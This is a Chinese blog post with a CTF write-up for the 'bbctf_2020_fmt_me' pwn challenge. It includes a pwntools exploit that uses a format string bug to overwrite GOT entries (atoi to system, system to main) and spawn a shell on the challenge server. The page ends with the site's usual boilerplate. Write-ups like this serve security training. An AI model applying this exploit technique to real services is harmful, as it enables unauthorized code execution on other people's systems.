bbctf_2020_fmt_me

最新推荐文章于 2023-02-08 09:36:22 发布
最新推荐文章于 2023-02-08 09:36:22 发布
阅读量309 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124079201
版权

bbctf_2020_fmt_me

查看保护
在这里插入图片描述
简单题
在这里插入图片描述
格式化漏洞
这里没有显示所以我们可以gdb看
在这里插入图片描述
在这里插入图片描述
offest为6,把atoi改成system,把system改成main_addr,回到main_addr的时候传入bin_sh就可以getshell了

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28486)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

system_addr = 0x04012E1
atoi_got = elf.got['atoi']
system_got = elf.got['system']
main_addr = elf.sym['main']
system_plt = elf.plt['system']
fini = 0x403E08

offest = 6

r.sendline('2')
p1 = fmtstr_payload(offest, {atoi_got:system_plt + 6, system_got:main_addr})
r.recvuntil("Good job. I'll give you a gift.")
r.sendline(p1)

r.sendline('/bin/sh')

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
dhcp_minires_and_fmt_string.nasl
11-08
dhcp_minires_and_fmt_string
pwn题bbctf_2020_fmt_me
热门推荐
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 381
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
Ubuntu18学习记录(持续更新中~~~)
Probeginner的博客
10-27 543
避免虚拟机崩溃
LVGL lv_label_set_text_fmt 显示只有f
weixin_44684950的博客
04-26 3746
LVGL lv_label_set_text_fmt 显示只有f
mplane方式v4l2应用分析 -- VIDIOC_S_FMT(设置图像格式)
ldl617的专栏
09-26 3110
Linux v4l2架构学习总链接 设置图像格式 VIDIOC_S_FMT v4l2应用代码如下: struct v4l2_format fmt; memset(&fmt, 0, sizeof(struct v4l2_format)); fmt.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE; fmt.fmt.pix_mp.width = 2400; fmt.fmt.pix_mp.height = 1920; fmt.fm
ffmpeg命令分析-pix_fmt
u012117034的博客
03-14 5491
本系列 以 ffmpeg4.2 源码为准,下载地址:链接:百度网盘提取码:g3k8 本系列主要分析各种 ffmpeg 命令参数 在代码里是如何实现的。a.mp4下载链接:百度网盘,提取码:nl0s 。 命令如下: ffmpeg -vcodec h264 -i a.mp4 -pix_fmt nv12 -vcodec h264_mf -acodec copy a_h264_nvenc.mp4 -y 上面的命令是解码,然后编码,本文不关注编解码,主要分析-pix_fmt nv12参数,由于一些硬件...
【Linux内核】pr_fmt介绍
05-20 1526
文章目录1. pr_fmt2. 常用`pr_fmt`定义2.1. 打印模块名、函数名和行号2.2. 打印CPU号2.3. 打印线程pid和线程名2.4. 打印进程pid和进程名2.5. 打印进程pid和线程pid2.6. 大杂烩3. 常见pr_*()接口3.1. `pr_devel`和`pr_debug` 1. pr_fmt 在阅读Linux内核或其他开源代码时,在文件的开始部分,通常能看到类似如下代码。但是代码中又没有看到使用的地方。 #define pr_fmt(fmt) KBUILD_MODNAME
fmt.rar_FMT
09-24
`fmt`是一个经典的文本格式化工具,主要用于将输入的文本文件或者标准输入按照特定的格式输出到标准输出。这个工具在Unix-like系统中非常常见,是早期UNIX操作系统的内置命令之一,现在也在许多现代Linux发行版和类...
JSTLSample.rar_We See
09-14
2. ** fmt Library (fmt:)**:用于格式化日期、数字和消息。 3. **Function Tags (fn:)**:提供了一些辅助函数,如字符串操作、数组和集合操作。 4. **XML Library (x:)**:处理XML文档。 5. **JDBC Library (sql:)*...
CPP.rar_visual c
09-23
8. **格式化输出库fmt**:除了标准库提供的格式化功能,还有一些第三方库如`fmtlib`提供了更强大的格式化输出功能,支持C++11及更高版本,其语法简洁且强大。 压缩包中的文件 "C++.doc" 很可能包含了上述知识点的...
wav.rar_VC WAV
09-14
3. **WAV文件格式**:了解WAV文件的结构,包括RIFF头、fmt chunk、data chunk等,以及如何解析这些信息。 4. **Windows API**:掌握如何使用Windows的多媒体API,比如MMSystem库,特别是WaveOutWrite函数,来播放...
2月国内外CTF比赛时间汇总来了!
网络安全
02-08 5034
●从事网络安全行业工作,怎么能不参加一次CTF比赛了!小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣!下面给大家分享一下2月份CTF比赛时间,比赛按时间先后排序,国内国外的都有哦!文章末尾有ctf部落群国内CTF比赛汇总西湖论剑·2022中国杭州网络安全技能大赛12月13日,在“首届全球数字贸易博览会·数字安全主题论坛”上,浙江省公安厅一级警务专员石小忠、浙江省委网信办副主任马晓军、杭州市公...
培训课件 -从0到1搭建培训管理体系.pptx
07-13
培训课件 -从0到1搭建培训管理体系.pptx
tensorflow-gpu-2.9.0-cp37-cp37m-win-amd64.whl.zip.(whl)
最新发布
07-14
使用时需去掉后缀.(whl)后再解压
JavaScript:ES6新特性深入解析
07-14
JavaScript:ES6新特性深入解析
spdk_json_write_string_fmt
05-13
`spdk_json_write_string_fmt` 是 SPDK (Storage Performance Development Kit) 库中的一个函数,用于将一个格式化的字符串作为 JSON 字符串写入到 JSON 输出缓冲区中。 函数原型如下: ```c int spdk_json_write_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值